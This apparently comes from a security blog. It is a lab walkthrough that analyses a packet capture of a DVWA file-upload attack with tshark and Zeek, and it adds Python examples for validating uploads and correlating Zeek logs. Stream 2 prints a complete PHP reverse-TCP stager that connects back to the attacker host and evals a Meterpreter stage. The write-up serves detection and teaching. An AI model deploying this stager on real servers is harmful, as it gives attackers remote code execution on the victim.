</div><div><br /></div><div><div>Analyzing the PCAP. No need to go through the entire process; we've done a lot of the heavy lifting in the earlier posts, so this builds on what was done before.</div><div><br /></div><div>How many unique streams/sessions do we have in this PCAP?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -T fields -e tcp.stream | sort --unique | wc --lines</span>
<span style="color: white;">5</span>
</pre></div>
</div><div><br /></div><div><div>With 5 streams, we should be able to quickly analyze these. Starting with stream 0.</div><div><br /></div><div>Looking at the first 30 lines of the reassembled TCP stream.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/file_upload]</span>
<span>└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,0 | head --lines=30</span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 0</span>
<span>Node 0: 10.0.0.108:55686</span>
<span>Node 1: 10.0.0.106:80</span>
<span>1460</span>
<span style="font-weight: bold;">POST</span> <span>/dvwa/vulnerabilities/upload/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span>
<span style="font-weight: bold;">Accept-Language</span><span>:</span> <span>en-US,en;q=0.5</span>
<span style="font-weight: bold;">Accept-Encoding</span><span>:</span> <span>gzip, deflate</span>
<span style="font-weight: bold;">Content-Type</span><span>:</span> <span>multipart/form-data; boundary=---------------------------40506030756611040921021496595</span>
<span style="font-weight: bold;">Content-Length</span><span>:</span> <span>64966</span>
<span style="font-weight: bold;">Origin</span><span>:</span> <span>http://10.0.0.106</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>keep-alive</span>
<span style="font-weight: bold;">Referer</span><span>:</span> <span>http://10.0.0.106/dvwa/vulnerabilities/upload/</span>
<span style="font-weight: bold;">Cookie</span><span>:</span> <span>security=low; PHPSESSID=i16a2p6b95up7nrnbi3foov7bf</span>
<span style="font-weight: bold;">Upgrade-Insecure-Requests</span><span>:</span> <span>1</span>
-----------------------------40506030756611040921021496595
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
-----------------------------40506030756611040921021496595
Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"
Content-Type: image/png
.PNG</span>
</pre></div>
</div><div><br /></div><div><div>We see above that the uploaded file has the name "<i>hack_and_detect.png</i>" and is a <i>.PNG</i> image file, as can be seen from "Content-Type: image/png" (keeping in mind that both the filename and this Content-Type are supplied by the client).</div><div><br /></div><div>Was this file upload successful? Looking for any report of the file name being successfully uploaded.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,0 | grep "hack_and_detect"</span>
<span style="color: white;">Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"</span>
<span><span style="color: white;">..<pre>.</span><b><span style="color: #fcff01;">./../hackable/uploads/hack_and_detect.png succesfully uploaded</span></b><span style="color: white;">!</pre></span></span>
</pre></div>
</div><div><br /></div><div>Let's see what is in stream 1.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/file_upload]</span>
<span>└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,1 | head --lines=25</span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 1</span>
<span>Node 0: 10.0.0.108:55814</span>
<span>Node 1: 10.0.0.106:80</span>
<span>116</span>
<span style="font-weight: bold;">GET</span> <span>/dvwa//hackable/uploads/hack_and_detect.png</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>curl/7.88.1</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>*/*</span>
1460
HTTP/1.1 200 OK
Date: Thu, 22 Jun 2023 19:24:42 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 22 Jun 2023 19:23:33 GMT
ETag: "fbed-5febcd1f850e8"
Accept-Ranges: bytes
Content-Length: 64493
Content-Type: image/png
.PNG</span>
</pre></div>
</div><div><br /></div><div><div>Above, it looks like a request was made for the same image which was previously uploaded.</div><div><br /></div><div>Looking at stream 2.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/file_upload]</span>
<span>└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,2 | head --lines=33</span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 2</span>
<span>Node 0: 10.0.0.108:47986</span>
<span>Node 1: 10.0.0.106:80</span>
<span>1460</span>
<span style="font-weight: bold;">POST</span> <span>/dvwa/vulnerabilities/upload/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span>
<span style="font-weight: bold;">Accept-Language</span><span>:</span> <span>en-US,en;q=0.5</span>
<span style="font-weight: bold;">Accept-Encoding</span><span>:</span> <span>gzip, deflate</span>
<span style="font-weight: bold;">Content-Type</span><span>:</span> <span>multipart/form-data; boundary=---------------------------3215483674970812347988844840</span>
<span style="font-weight: bold;">Content-Length</span><span>:</span> <span>1582</span>
<span style="font-weight: bold;">Origin</span><span>:</span> <span>http://10.0.0.106</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>keep-alive</span>
<span style="font-weight: bold;">Referer</span><span>:</span> <span>http://10.0.0.106/dvwa/vulnerabilities/upload/</span>
<span style="font-weight: bold;">Cookie</span><span>:</span> <span>security=low; PHPSESSID=i16a2p6b95up7nrnbi3foov7bf</span>
<span style="font-weight: bold;">Upgrade-Insecure-Requests</span><span>:</span> <span>1</span>
-----------------------------3215483674970812347988844840
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
-----------------------------3215483674970812347988844840
Content-Disposition: form-data; name="uploaded"; filename="malicious.php"
Content-Type: application/x-php
/*<?php /**/ error_reporting(0); $ip = '10.0.0.108'; $port = 9999; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_ty
752
pe) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
-----------------------------3215483674970812347988844840</span>
</pre></div>
</div><div><br /></div><div><div>There we see a PHP file was uploaded. Was the upload successful?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,2 | grep "malicious.php"</span>
<span style="color: white;">Content-Disposition: form-data; name="uploaded"; filename="malicious.php"</span>
<span><span style="color: white;">..<pre></span><b><span style="color: #fcff01;">../../hackable/uploads/malicious.php succesfully uploaded!<</span></b><span style="color: white;">/pre></span></span>
</pre></div>
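<p>As an added example (not part of the original post, of DVWA or of tshark), the following Python code parses a multipart/form-data body shaped like the POSTs seen in the "Request" tab and in stream 2, and applies the server-side checks that would have rejected <i>malicious.php</i>: the filename extension, the declared Content-Type, and whether the bytes actually begin with the image's magic number. It goes one step beyond the post by also catching an image-named file that carries a PHP open tag. The boundary and filenames are taken from the post; the body is constructed, and the allowed image list and extension list are assumptions.</p>

```python
"""Server-side checks for a multipart/form-data upload like the one in stream 2.

Added example for this post, not DVWA's, Nikto's or tshark's code. SAMPLE_BODY is
constructed: boundary and filenames come from the post (PNG part as in stream 0,
PHP part as in stream 2 with the payload replaced by a short stand-in); the
allowed image types and the script-extension list are assumptions.
"""
import re

SCRIPT_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")      # assumed list
IMAGE_MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n",               # assumed allow-list
               "image/jpeg": b"\xff\xd8\xff", "image/gif": b"GIF8"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Boundary value as seen in the Content-Type header of stream 2.
BOUNDARY = b"---------------------------3215483674970812347988844840"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY.decode()


def boundary_from_content_type(content_type):
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if m is None:
        raise ValueError("no boundary in Content-Type")
    return m.group(1).encode()


def parse_multipart(body, boundary):
    """Yield one dict per part: name, filename, content_type, data (bytes)."""
    delim = b"--" + boundary
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break                                # closing delimiter --boundary--
        if not chunk.startswith(b"\r\n"):
            raise ValueError("malformed part: expected CRLF after boundary")
        head, sep, data = chunk[2:].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("malformed part: no blank line after headers")
        if data.endswith(b"\r\n"):
            data = data[:-2]                     # CRLF belongs to the next delimiter
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?:^|[ ;])name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        yield {"name": name.group(1) if name else None,
               "filename": fname.group(1) if fname else None,
               "content_type": headers.get("content-type"), "data": data}


def assess_upload(body, content_type):
    """Return {filename: [reasons]} for each file part the server should reject."""
    verdicts = {}
    for part in parse_multipart(body, boundary_from_content_type(content_type)):
        if part["filename"] is None:
            continue                             # plain field (MAX_FILE_SIZE, Upload)
        reasons = []
        if part["filename"].lower().endswith(SCRIPT_EXT):
            reasons.append("server-side script extension")
        magic = IMAGE_MAGIC.get(part["content_type"])
        if magic is None:                        # Content-Type is client-supplied
            reasons.append("content-type is not an allowed image type")
        elif not part["data"].startswith(magic):
            reasons.append("content does not match declared image type")
        if PHP_TAG.search(part["data"]):         # catches image-named polyglots too
            reasons.append("php open tag inside file content")
        if reasons:
            verdicts[part["filename"]] = reasons
    return verdicts


def _part(headers, data):
    """Assemble one part; used only to construct the sample body."""
    return b"--" + BOUNDARY + b"\r\n" + headers + b"\r\n\r\n" + data + b"\r\n"


SAMPLE_BODY = (
    _part(b'Content-Disposition: form-data; name="MAX_FILE_SIZE"', b"100000")
    + _part(b'Content-Disposition: form-data; name="uploaded"; '
            b'filename="hack_and_detect.png"\r\nContent-Type: image/png',
            b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)          # constructed PNG stub
    + _part(b'Content-Disposition: form-data; name="uploaded"; '
            b'filename="malicious.php"\r\nContent-Type: application/x-php',
            b"/*<?php /**/ error_reporting(0); /* payload stand-in */")
    + _part(b'Content-Disposition: form-data; name="Upload"', b"Upload")
    + b"--" + BOUNDARY + b"--\r\n"
)

if __name__ == "__main__":
    for fname, why in assess_upload(SAMPLE_BODY, CONTENT_TYPE).items():
        print(f"reject {fname}: {'; '.join(why)}")
```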
</div><div><br /></div><div>Yes it was. Moving on to stream 3.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/file_upload]</span>
<span>└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,3 </span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 3</span>
<span>Node 0: 10.0.0.108:33048</span>
<span>Node 1: 10.0.0.106:80</span>
<span>109</span>
<span style="font-weight: bold;">GET</span> <span>/dvwa/hackable/uploads/malicious.php</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>curl/7.88.1</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>*/*</span>
214
HTTP/1.1 200 OK
Date: Thu, 22 Jun 2023 19:28:29 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2
/*
5
0
===================================================================</span>
</pre></div>
</div><div><br /></div><div>Stream <i>3</i> seems to be just the request for the <i>malicious.php</i> file using <i>curl</i>, but there is not much detail inside the response: the body is a single two-byte chunk, <i>/*</i>. Very interesting.</div><div><div><br /></div><div>Looking at stream 4.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,4 | more </span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Follow: tcp,ascii</span>
<span style="color: white;">Filter: tcp.stream eq 4</span>
<span style="color: white;">Node 0: 10.0.0.106:49786</span>
<span style="color: white;">Node 1: 10.0.0.108:9999</span>
<span style="color: white;"> 4</span>
<span style="color: white;">....</span>
<span style="color: white;"> 1460</span>
<span style="color: white;">/*&lt;?php /**/</span>
<span style="color: white;">if (!isset($GLOBALS['channels'])) {</span>
<span style="color: white;"> $GLOBALS['channels'] = array();</span>
<span style="color: white;">}</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>We see something here to do with <i>.php</i>. Looking further into the payload, we ultimately see:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,4 | grep meter</span>
<span style="color: white;">my_print("Evaling main meterpreter stage");</span>
</pre></div>
</div><div><br /></div><div><div>That's a big clue that we have a real problem here on port 9999.</div><div><br /></div><div>At this point, we know there are a number of files within these HTTP sessions. Fortunately, TShark can extract content from HTTP so we don't have to manually attempt to carve any of these. Let's extract those files with TShark.</div><div><br /></div><div>Looking at the help, we see the TShark --export-objects usage.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark --export-objects --help </span>
<span style="color: white;">tshark: "--export-objects" are specified as: &lt;protocol&gt;,&lt;destdir&gt;</span>
<span style="color: white;">tshark: The available export object types for the "--export-objects" option are:</span>
<span style="color: white;"> dicom</span>
<span style="color: white;"> ftp-data</span>
<span style="color: white;"> http</span>
<span style="color: white;"> imf</span>
<span style="color: white;"> smb</span>
<span style="color: white;"> tftp</span>
</pre></div>
</div><div><br /></div><div>Exporting from HTTP.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q --export-objects http,./exported-contents/</span>
</pre></div>
</div><div><br /></div><div>Looking at the exported contents we see:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ ls -l exported-contents/</span>
<span style="color: white;">total 144</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 64493 Jun 23 08:31 hack_and_detect.png</span>
<span><span style="color: white;">-rw-r--r-- 1 kali kali 2 Jun 23 08:31 </span><b><span style="color: #fcff01;">malicious.php</span></b></span>
<span style="color: white;">-rw-r--r-- 1 kali kali 64966 Jun 23 08:31 upload</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 4061 Jun 23 08:31 'upload(1)'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1582 Jun 23 08:31 'upload(2)'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 4055 Jun 23 08:31 'upload(3)'</span>
</pre></div>
</div><div><br /></div><div><div>Confirming the files using the file command.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ file exported-contents/*</span>
<span style="color: white;">exported-contents/hack_and_detect.png: PNG image data, 178 x 127, 8-bit/color RGBA, non-interlaced</span>
<b><span style="color: #fcff01;"><span>exported-contents/malicious.php: ASCII text, with no line terminators</span>
</span></b><span style="color: white;">exported-contents/upload: data</span>
<span style="color: white;">exported-contents/upload(1): HTML document, ASCII text, with very long lines (472), with CRLF, LF line terminators</span>
<span style="color: white;">exported-contents/upload(2): ASCII text, with very long lines (1111), with CRLF line terminators</span>
<span style="color: white;">exported-contents/upload(3): HTML document, ASCII text, with very long lines (472), with CRLF, LF line terminators</span>
</pre></div>
</div><div><br /></div><div><div>At this point, you can analyze the files as needed. I will transition to Zeek to see what it saw.</div></div><div><br /></div><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div><div><br /></div><div>Set up Zeek</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div>Focusing on the indicators of compromise, "<i>hack_and_detect.png</i>" and "<i>malicious.php</i>". First, "<i>hack_and_detect.png</i>":</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">└─$ cat http.log | grep --perl-regexp "hack_and_detect" </span>
<span style="color: white;">1687461839.117382 CcgONKdzshQp8ZH68 10.0.0.108 55686 10.0.0.106 80 1 POST 10.0.0.106 /dvwa/vulnerabilities/upload/ http://10.0.0.106/dvwa/vulnerabilities/upload/ 1.1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 http://10.0.0.106 64966 4061 200 OK - - (empty) - - - F8D5nXnU24QCFs3ni,FL8pyG3KgVYBxGp5J8,FjahXg2bW4MO7TWJok hack_and_detect.png image/png Fr5Uwyf1md9rma0F1 - text/html</span>
<span style="color: white;">1687461900.287690 Ca15Kb1F57kcgJCx8j 10.0.0.108 55814 10.0.0.106 80 1 GET 10.0.0.106 /dvwa//hackable/uploads/hack_and_detect.png - 1.1 curl/7.88.1 - 0 64493 200 OK - - (empty) - - - - - - FRXytH1roWzznSMp5d - image/png</span>
</pre></div>
</div><div><br /></div><div>Looking at <i>malicious.php</i>.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload] </span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp "malicious.php"</span>
<span style="color: white;">1687462020.720561 C9k6p6FxgHAgjfjGa 10.0.0.108 47986 10.0.0.106 80 1 POST 10.0.0.106 /dvwa/vulnerabilities/upload/ http://10.0.0.106/dvwa/vulnerabilities/upload/ 1.1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 http://10.0.0.106 1582 4055 200 OK - - (empty) - - - FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa malicious.php text/x-php Fnwwck3gnEGZ79OWy1 - text/html</span>
<span style="color: white;">1687462143.814819 CwNOXb1eZ6LvtPEI96 10.0.0.108 33048 10.0.0.106 80 1 GET 10.0.0.106 /dvwa/hackable/uploads/malicious.php - 1.1 curl/7.88.1 - 0 2 200 OK - - (empty) - - - - - - FVkDFy3Q20vdj9aPCk - -</span>
</pre></div>
</div><div><br /></div><div>Looking across the various logs for the UID "<i>C9k6p6FxgHAgjfjGa</i>" and keeping only the entries that carry the non-zero sizes (1111 and 4055 bytes), we get:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ grep "C9k6p6FxgHAgjfjGa" *.log | grep --perl-regexp "1111|4055" </span>
<span><span style="color: white;">files.log:1687462020.720573 F3m3sc1e7ZmJMAs5Cc C9k6p6FxgHAgjfjGa 10.0.0.108 47986 10.0.0.106 80 HTTP 0 (empty) text/x-php </span><b><span style="color: #fcff01;">malicious.php</span></b><span style="color: white;"> 0.000000 - T 1111 - 0 0 F - - - - - --</span></span>
<span style="color: white;">files.log:1687462020.751930 Fnwwck3gnEGZ79OWy1 C9k6p6FxgHAgjfjGa 10.0.0.108 47986 10.0.0.106 80 HTTP 0 (empty) text/html - 0.000001 - F 4055 4055 0 0 F - - - - - - -</span>
<span style="color: white;">http.log:1687462020.720561 C9k6p6FxgHAgjfjGa 10.0.0.108 47986 10.0.0.106 80 1 POST 10.0.0.106 /dvwa/vulnerabilities/upload/ http://10.0.0.106/dvwa/vulnerabilities/upload/ 1.1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 http://10.0.0.106 1582 4055 200 OK - - (empty) - - - FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa malicious.php text/x-php Fnwwck3gnEGZ79OWy1 - text/html</span>
</pre></div>
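<div><br /></div><div>The UID join that the grep above performs by hand, as an added example that is not part of the original post: a small Python script that parses Zeek's tab-separated <i>http.log</i> and <i>files.log</i> by their <i>#fields</i> headers, joins them on the connection UID, and reports POSTs whose uploaded content Zeek sniffed as script source. The log records are constructed from the entries shown above and trimmed to the columns the check reads; the script MIME list and extension list are assumptions to tune for your environment.</div>

```python
"""Correlate Zeek http.log and files.log by connection UID and flag uploads that
Zeek's file sniffing classified as script content (text/x-php here), the pattern
the post finds by grepping for UID C9k6p6FxgHAgjfjGa across the logs.

The parser is driven by the #fields header, so it works on full Zeek logs; the
samples below are constructed from the entries quoted in the post and trimmed to
the columns this check reads.
"""
from collections import defaultdict

# MIME types Zeek's signatures assign to server-side script source, and file
# extensions a web tier should never accept as an upload. Assumed lists: extend.
SCRIPT_MIMES = {"text/x-php", "text/x-perl", "text/x-python", "text/x-shellscript"}
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".pl", ".py", ".sh")

# Constructed sample logs (tab-separated, '-' = unset, as Zeek writes them).
HTTP_LOG = "\n".join("\t".join(row) for row in [
    ["#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
     "method", "uri", "status_code", "orig_fuids", "orig_filenames",
     "orig_mime_types"],
    ["1687461839.117382", "CcgONKdzshQp8ZH68", "10.0.0.108", "55686", "10.0.0.106",
     "80", "POST", "/dvwa/vulnerabilities/upload/", "200",
     "F8D5nXnU24QCFs3ni,FL8pyG3KgVYBxGp5J8,FjahXg2bW4MO7TWJok",
     "hack_and_detect.png", "image/png"],
    ["1687462020.720561", "C9k6p6FxgHAgjfjGa", "10.0.0.108", "47986", "10.0.0.106",
     "80", "POST", "/dvwa/vulnerabilities/upload/", "200",
     "FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa",
     "malicious.php", "text/x-php"],
    ["1687462143.814819", "CwNOXb1eZ6LvtPEI96", "10.0.0.108", "33048", "10.0.0.106",
     "80", "GET", "/dvwa/hackable/uploads/malicious.php", "200", "-", "-", "-"],
])
FILES_LOG = "\n".join("\t".join(row) for row in [
    ["#fields", "ts", "fuid", "uid", "source", "mime_type", "filename", "is_orig",
     "seen_bytes"],
    ["1687461839.117390", "FL8pyG3KgVYBxGp5J8", "CcgONKdzshQp8ZH68", "HTTP",
     "image/png", "hack_and_detect.png", "T", "64493"],
    ["1687462020.720573", "FbKoDB2gXDz6wz2Z74", "C9k6p6FxgHAgjfjGa", "HTTP",
     "-", "-", "T", "0"],  # zero-byte multipart field, the noise the post drops
    ["1687462020.720573", "F3m3sc1e7ZmJMAs5Cc", "C9k6p6FxgHAgjfjGa", "HTTP",
     "text/x-php", "malicious.php", "T", "1111"],
    ["1687462020.751930", "Fnwwck3gnEGZ79OWy1", "C9k6p6FxgHAgjfjGa", "HTTP",
     "text/html", "-", "F", "4055"],  # the server's response body, not an upload
])


def parse_zeek(text):
    """Parse Zeek TSV output into dicts keyed by the names in the #fields line."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue  # #separator, #path, #close and friends carry no records
        else:
            values = line.split("\t")
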